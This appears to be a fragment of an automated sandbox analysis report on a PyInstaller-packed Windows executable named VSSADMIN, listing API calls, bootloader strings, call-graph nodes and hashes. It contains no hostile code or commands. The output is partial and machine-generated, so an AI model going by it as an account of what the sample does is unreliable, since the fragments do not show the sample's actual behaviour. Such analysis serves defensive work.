7ff614c8a750, 7ff614c8a77a, 7ff614c8a78a, 7ff614c8a796: FlsSetValue
7ff614c91154: GetOEMCP
7ff614c9116b: GetACP
7ff614c91846: IsValidCodePage
7ff614c91289, 7ff614c91886: GetCPInfo
7ff614c867b0: FindFirstFileExW
7ff614c867d2: GetLastError
7ff614c868f4: FindNextFileW
7ff614c86903: GetLastError
7ff614c869d2: FileTimeToSystemTime
7ff614c869e1: SystemTimeToTzSpecificLocalTime
7ff614c90052, 7ff614c96743: SetEnvironmentVariableW

CRT-internal routines named in the same graph: _wfindfirst32i64, _fread_nolock, _set_fmode, _invalid_parameter_noinfo, __scrt_get_show_window_mode, __std_exception_destroy, __std_exception_copy, __free_lconv_mon, __FrameHandler3::FrameUnwindToEmptyState, __vcrt_FlsAlloc, __crtLCMapStringW, memcpy_s.
19098 7ff614c885a6 19097->19098 19098->19096 19099 7ff614c88454 12 API calls 19098->19099 19099->19096 19101 7ff614c963a9 19100->19101 19104 7ff614c963d6 19100->19104 19102 7ff614c963ae 19101->19102 19101->19104 19103 7ff614c84474 _set_fmode 11 API calls 19102->19103 19106 7ff614c963b3 19103->19106 19105 7ff614c9641a 19104->19105 19108 7ff614c96439 19104->19108 19120 7ff614c9640e __crtLCMapStringW 19104->19120 19107 7ff614c84474 _set_fmode 11 API calls 19105->19107 19109 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19106->19109 19110 7ff614c9641f 19107->19110 19111 7ff614c96443 19108->19111 19112 7ff614c96455 19108->19112 19113 7ff614c963be 19109->19113 19115 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19110->19115 19116 7ff614c84474 _set_fmode 11 API calls 19111->19116 19114 7ff614c84a4c 45 API calls 19112->19114 19113->18946 19117 7ff614c96462 19114->19117 19115->19120 19118 7ff614c96448 19116->19118 19117->19120 19254 7ff614c97f74 19117->19254 19119 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19118->19119 19119->19120 19120->18946 19123 7ff614c84474 _set_fmode 11 API calls 19123->19120 19125 7ff614c88039 19124->19125 19134 7ff614c88035 19124->19134 19126 7ff614c91760 65 API calls 19125->19126 19127 7ff614c8803e 19126->19127 19147 7ff614c91a9c GetEnvironmentStringsW 19127->19147 19130 7ff614c8804b 19132 7ff614c89e48 __free_lconv_mon 11 API calls 19130->19132 19131 7ff614c88057 19167 7ff614c88104 19131->19167 19132->19134 19134->19013 19139 7ff614c88374 19134->19139 19136 7ff614c89e48 __free_lconv_mon 11 API calls 19137 7ff614c8807e 19136->19137 19138 7ff614c89e48 __free_lconv_mon 11 API calls 19137->19138 19138->19134 19140 7ff614c8839d 19139->19140 19145 7ff614c883b6 19139->19145 19140->19013 19141 7ff614c8f0e8 WideCharToMultiByte 19141->19145 19142 7ff614c8dd70 _set_fmode 11 API calls 19142->19145 19143 7ff614c88446 19144 7ff614c89e48 __free_lconv_mon 11 API calls 19143->19144 19144->19140 19145->19140 19145->19141 19145->19142 
19145->19143 19146 7ff614c89e48 __free_lconv_mon 11 API calls 19145->19146 19146->19145 19148 7ff614c88043 19147->19148 19149 7ff614c91acc 19147->19149 19148->19130 19148->19131 19150 7ff614c8f0e8 WideCharToMultiByte 19149->19150 19151 7ff614c91b1d 19150->19151 19152 7ff614c91b24 FreeEnvironmentStringsW 19151->19152 19153 7ff614c8cafc _fread_nolock 12 API calls 19151->19153 19152->19148 19154 7ff614c91b37 19153->19154 19155 7ff614c91b3f 19154->19155 19156 7ff614c91b48 19154->19156 19157 7ff614c89e48 __free_lconv_mon 11 API calls 19155->19157 19158 7ff614c8f0e8 WideCharToMultiByte 19156->19158 19159 7ff614c91b46 19157->19159 19160 7ff614c91b6b 19158->19160 19159->19152 19161 7ff614c91b6f 19160->19161 19162 7ff614c91b79 19160->19162 19164 7ff614c89e48 __free_lconv_mon 11 API calls 19161->19164 19163 7ff614c89e48 __free_lconv_mon 11 API calls 19162->19163 19165 7ff614c91b77 FreeEnvironmentStringsW 19163->19165 19164->19165 19165->19148 19168 7ff614c88129 19167->19168 19169 7ff614c8dd70 _set_fmode 11 API calls 19168->19169 19181 7ff614c8815f 19169->19181 19170 7ff614c88167 19171 7ff614c89e48 __free_lconv_mon 11 API calls 19170->19171 19172 7ff614c8805f 19171->19172 19172->19136 19173 7ff614c881da 19174 7ff614c89e48 __free_lconv_mon 11 API calls 19173->19174 19174->19172 19175 7ff614c8dd70 _set_fmode 11 API calls 19175->19181 19176 7ff614c881c9 19178 7ff614c88330 11 API calls 19176->19178 19177 7ff614c891dc __std_exception_copy 37 API calls 19177->19181 19179 7ff614c881d1 19178->19179 19182 7ff614c89e48 __free_lconv_mon 11 API calls 19179->19182 19180 7ff614c881ff 19184 7ff614c89e00 _wfindfirst32i64 17 API calls 19180->19184 19181->19170 19181->19173 19181->19175 19181->19176 19181->19177 19181->19180 19183 7ff614c89e48 __free_lconv_mon 11 API calls 19181->19183 19182->19170 19183->19181 19185 7ff614c88212 19184->19185 19187 7ff614c95710 19186->19187 19188 7ff614c956f9 19186->19188 19187->19188 19190 7ff614c9571e 19187->19190 19189 7ff614c84474 _set_fmode 11 API calls 
19188->19189 19191 7ff614c956fe 19189->19191 19193 7ff614c84a4c 45 API calls 19190->19193 19194 7ff614c95709 19190->19194 19192 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19191->19192 19192->19194 19193->19194 19194->19029 19196 7ff614c84a4c 45 API calls 19195->19196 19197 7ff614c983dd 19196->19197 19200 7ff614c98034 19197->19200 19202 7ff614c98082 19200->19202 19201 7ff614c7adb0 _wfindfirst32i64 8 API calls 19203 7ff614c965b5 19201->19203 19204 7ff614c98109 19202->19204 19206 7ff614c980f4 GetCPInfo 19202->19206 19209 7ff614c9810d 19202->19209 19203->19029 19203->19050 19205 7ff614c8e820 _fread_nolock MultiByteToWideChar 19204->19205 19204->19209 19207 7ff614c981a1 19205->19207 19206->19204 19206->19209 19208 7ff614c8cafc _fread_nolock 12 API calls 19207->19208 19207->19209 19210 7ff614c981d8 19207->19210 19208->19210 19209->19201 19210->19209 19211 7ff614c8e820 _fread_nolock MultiByteToWideChar 19210->19211 19212 7ff614c98246 19211->19212 19213 7ff614c8e820 _fread_nolock MultiByteToWideChar 19212->19213 19222 7ff614c98328 19212->19222 19215 7ff614c9826c 19213->19215 19214 7ff614c89e48 __free_lconv_mon 11 API calls 19214->19209 19216 7ff614c8cafc _fread_nolock 12 API calls 19215->19216 19217 7ff614c98299 19215->19217 19215->19222 19216->19217 19218 7ff614c8e820 _fread_nolock MultiByteToWideChar 19217->19218 19217->19222 19219 7ff614c98310 19218->19219 19220 7ff614c98330 19219->19220 19221 7ff614c98316 19219->19221 19229 7ff614c8e040 19220->19229 19221->19222 19224 7ff614c89e48 __free_lconv_mon 11 API calls 19221->19224 19222->19209 19222->19214 19224->19222 19226 7ff614c9836f 19226->19209 19228 7ff614c89e48 __free_lconv_mon 11 API calls 19226->19228 19227 7ff614c89e48 __free_lconv_mon 11 API calls 19227->19226 19228->19209 19230 7ff614c8dde8 __crtLCMapStringW 5 API calls 19229->19230 19231 7ff614c8e07e 19230->19231 19232 7ff614c8e086 19231->19232 19233 7ff614c8e2a8 __crtLCMapStringW 5 API calls 19231->19233 19232->19226 19232->19227 19234 7ff614c8e0ef 
CompareStringW 19233->19234 19234->19232 19236 7ff614c96ff1 19235->19236 19237 7ff614c9700a HeapSize 19235->19237 19238 7ff614c84474 _set_fmode 11 API calls 19236->19238 19239 7ff614c96ff6 19238->19239 19240 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19239->19240 19241 7ff614c97001 19240->19241 19241->19055 19243 7ff614c8f9d1 19242->19243 19244 7ff614c8f9db 19242->19244 19245 7ff614c8cafc _fread_nolock 12 API calls 19243->19245 19246 7ff614c8f9e0 19244->19246 19252 7ff614c8f9e7 _set_fmode 19244->19252 19250 7ff614c8f9d9 19245->19250 19247 7ff614c89e48 __free_lconv_mon 11 API calls 19246->19247 19247->19250 19248 7ff614c8fa1a HeapReAlloc 19248->19250 19248->19252 19249 7ff614c8f9ed 19251 7ff614c84474 _set_fmode 11 API calls 19249->19251 19250->19059 19251->19250 19252->19248 19252->19249 19253 7ff614c926e0 _set_fmode 2 API calls 19252->19253 19253->19252 19255 7ff614c97f9d __crtLCMapStringW 19254->19255 19256 7ff614c9649e 19255->19256 19257 7ff614c8e040 6 API calls 19255->19257 19256->19120 19256->19123 19257->19256 17895 7ff614c887e9 17896 7ff614c89108 45 API calls 17895->17896 17897 7ff614c887ee 17896->17897 17898 7ff614c8885f 17897->17898 17899 7ff614c88815 GetModuleHandleW 17897->17899 17907 7ff614c886ec 17898->17907 17899->17898 17905 7ff614c88822 17899->17905 17905->17898 17921 7ff614c88910 GetModuleHandleExW 17905->17921 17927 7ff614c8f7b8 EnterCriticalSection 17907->17927 17922 7ff614c88944 GetProcAddress 17921->17922 17923 7ff614c8896d 17921->17923 17924 7ff614c88956 17922->17924 17925 7ff614c88972 FreeLibrary 17923->17925 17926 7ff614c88979 17923->17926 17924->17923 17925->17926 17926->17898

Control-flow Graph
APIs
• _get_daylight.LIBCMT ref: 00007FF614C94E95
  • Part of subcall function 00007FF614C947E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C947FC
  • Part of subcall function 00007FF614C89E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
  • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
  • Part of subcall function 00007FF614C89E00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF614C89DDF,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C89E09
  • Part of subcall function 00007FF614C89E00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF614C89DDF,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C89E2E
• _get_daylight.LIBCMT ref: 00007FF614C94E84
  • Part of subcall function 00007FF614C94848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9485C
• _get_daylight.LIBCMT ref: 00007FF614C950FA
• _get_daylight.LIBCMT ref: 00007FF614C9510B
• _get_daylight.LIBCMT ref: 00007FF614C9511C
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF614C9535C), ref: 00007FF614C95143
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLastPresentPrivilegeProcessProcessorReleaseTimeZone
• String ID: W. Europe Daylight Time$W. Europe Standard Time
• API String ID: 415722205-986674615
• Opcode ID: 33e166344f1c2e2cd7caacd2227ecf44b8e0e081e44327976083296b7a0746f2
• Instruction ID: cb42433b5953b0dda67b1e0089ff244890e0d84ac0495b15073d0d30240f97a8
• Opcode Fuzzy Hash: 33e166344f1c2e2cd7caacd2227ecf44b8e0e081e44327976083296b7a0746f2
• Instruction Fuzzy Hash: 3BD1C126E08A4296E7249F25D4D01B967B1FF56FA8F448137EA0DC7A85DF3DE841C740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4c9dcb694f9da37b9569774e6528ce897b09f0f884fc50d365155145b1bc53bc
• Instruction ID: b68f983b892a7b5db8c62fe9801dbb15b0ac0717b6815dec5b91bd7101bebb8a
• Opcode Fuzzy Hash: 4c9dcb694f9da37b9569774e6528ce897b09f0f884fc50d365155145b1bc53bc
• Instruction Fuzzy Hash: AFC1AD37B28E4295EB10CF68C4D06AC3771EB5AFA8B01523ADA2E97795DF3AD551C300
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C76837
  • Part of subcall function 00007FF614C769B0: GetEnvironmentVariableW.KERNEL32(00007FF614C73707), ref: 00007FF614C769EA
  • Part of subcall function 00007FF614C769B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF614C76A07
  • Part of subcall function 00007FF614C866E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C866FD
• SetEnvironmentVariableW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C768F1
  • Part of subcall function 00007FF614C72770: MessageBoxW.USER32 ref: 00007FF614C72845
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
• String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                      • API String ID: 3752271684-1116378104
                                                                                                                                                                      • Opcode ID: 1a0ee3ea3cf854b8610bb8cc6340f268ff9651d41f5ec51d8c7de28d4373f64b
                                                                                                                                                                      • Instruction ID: 1cae1ea25543fdb881c81395485c0a068bf470262e7b5c1990f7eaaaa6251334
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a0ee3ea3cf854b8610bb8cc6340f268ff9651d41f5ec51d8c7de28d4373f64b
                                                                                                                                                                      • Instruction Fuzzy Hash: 29515D21B0DA4392FE14A776A9952BAA2619F47FF1F445037ED0ECB797EE2DE4018300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

APIs
• _get_daylight.LIBCMT ref: 00007FF614C950FA
  • Part of subcall function 00007FF614C94848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9485C
• _get_daylight.LIBCMT ref: 00007FF614C9510B
  • Part of subcall function 00007FF614C947E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C947FC
• _get_daylight.LIBCMT ref: 00007FF614C9511C
  • Part of subcall function 00007FF614C94818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9482C
  • Part of subcall function 00007FF614C89E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
  • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF614C9535C), ref: 00007FF614C95143
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLastPrivilegeReleaseTimeZone
• String ID: W. Europe Daylight Time$W. Europe Standard Time
• API String ID: 1182710636-986674615
• Opcode ID: 51ad445c25b45f3d776946b5c57fad9b99f7b138fe1ab62d11b9ea19d7bbbd5c
• Instruction ID: 3467c06d292c2f9e9a3e86a1de5ffc1b2cf8cfba00a850a0ab9599cce632a896
• Opcode Fuzzy Hash: 51ad445c25b45f3d776946b5c57fad9b99f7b138fe1ab62d11b9ea19d7bbbd5c
• Instruction Fuzzy Hash: B251AD36A08E4296E714DF21E8C15B96770FB5AFA8F408137EA0DC3A96DF3DE4418740
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
• String ID:
• API String ID: 59578552-0
• Opcode ID: 2d1ec54d9dc1f814aac4ffc56ccc42f9ec7497739519b971d77b754768042176
• Instruction ID: 8589a500f0291bc674069ddf769efa1a77272bf0df5498fe465d48b40ae2e558
• Opcode Fuzzy Hash: 2d1ec54d9dc1f814aac4ffc56ccc42f9ec7497739519b971d77b754768042176
• Instruction Fuzzy Hash: 6EE0B670E1D94382F61876A95CC30BE10B05F97B30FA0023BE11AC7AD2CD6D2592AA26
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _fread_nolock$Message_invalid_parameter_noinfo
• String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
• API String ID: 2153230061-4158440160
• Opcode ID: 74b152d2f2539e24a2e932bae29537e2be075208bf4e50edcea38641dca22453
• Instruction ID: fc024c6191311fc2d0b1db3c8f92be47550509f0b7b486c87cb3a172f5e39cb1
• Opcode Fuzzy Hash: 74b152d2f2539e24a2e932bae29537e2be075208bf4e50edcea38641dca22453
• Instruction Fuzzy Hash: 9A514772A1DE0286EB54CF28D4D127823B1EB8AF69B518137DA0DC3799DE3CE541C740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 0-666925554
• Opcode ID: 1a5f48eb8e6aeba63a7b107ec5cbd23da28d659e00bdd0f0ebeaed79e5a7b8c4
• Instruction ID: 002627bfc82ce9889b8d8cd2fb871a574f5cee74e2ef7071d5e6b6c9794b3c83
• Opcode Fuzzy Hash: 1a5f48eb8e6aeba63a7b107ec5cbd23da28d659e00bdd0f0ebeaed79e5a7b8c4
• Instruction Fuzzy Hash: FC51AC61B0CE8292EA109B15E4D56B963B2AF86FF9F444133DE0D87796EE3EE5458300
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00000000,00007FF614C7687A,?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77910
• OpenProcessToken.ADVAPI32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77921
• GetTokenInformation.KERNELBASE(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77943
• GetLastError.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C7794D
• GetTokenInformation.KERNELBASE(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C7798A
• ConvertSidToStringSidW.ADVAPI32 ref: 00007FF614C7799C
• CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C779B4
• LocalFree.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C779E6
• ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF614C77A0D
• CreateDirectoryW.KERNELBASE(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77A1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                                                                      • Opcode ID: 8a88fb3c2216515b484f0d8182ac8353e0a7e80e230e5fdba7f3caac5ffba242
                                                                                                                                                                      • Instruction ID: d6865ce8e8da8e6b9fc4ba81797bd2e0a7ba25aab07dd6370f01fbdfa9e29f00
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a88fb3c2216515b484f0d8182ac8353e0a7e80e230e5fdba7f3caac5ffba242
                                                                                                                                                                      • Instruction Fuzzy Hash: CF41AF3161DE8692EB109F64E4846AA7371FB86BB5F401232EA9E876D5DF3DE404C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
• String ID: CreateProcessW$Error creating child process!
• API String ID: 2895956056-3524285272
• Opcode ID: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
• Instruction ID: d17c6e390d7880e1e4280f2270b8cece3af06fd1a86c0da9f8a39eadcb78234b
• Opcode Fuzzy Hash: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
• Instruction Fuzzy Hash: C7411232A0CB8292DA209B64F4952AAB3B4FB96774F500336E6AD877D5DF7CD0448B40
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
(rendered graph with Executed / Not Executed node legend not reproduced in this export; entry block 7ff614c71000-7ff614c736a6)

APIs
  • Part of subcall function 00007FF614C73BC0: GetModuleFileNameW.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C73BF1
• SetDllDirectoryW.KERNEL32 ref: 00007FF614C738C5
  • Part of subcall function 00007FF614C769B0: GetEnvironmentVariableW.KERNEL32(00007FF614C73707), ref: 00007FF614C769EA
  • Part of subcall function 00007FF614C769B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF614C76A07
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
• String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
• API String ID: 2344891160-3602715111
• Opcode ID: e605fd0aad1ab472f48a568d7d0ee426e99d24addfca6fff91547fc3397323d3
• Instruction ID: 9ec78fc48b73ec43f0d657773c76d560a36c888231572b90cab4fcc9a688604f
• Opcode Fuzzy Hash: e605fd0aad1ab472f48a568d7d0ee426e99d24addfca6fff91547fc3397323d3
• Instruction Fuzzy Hash: F0B18121A1CD8352EA64AB21D5D22BD23B1BF46FA6F444033EA4DC77A6EE2CE505C740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
(rendered graph with Executed / Not Executed node legend not reproduced in this export; entry block 7ff614c71050-7ff614c710ab)

Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
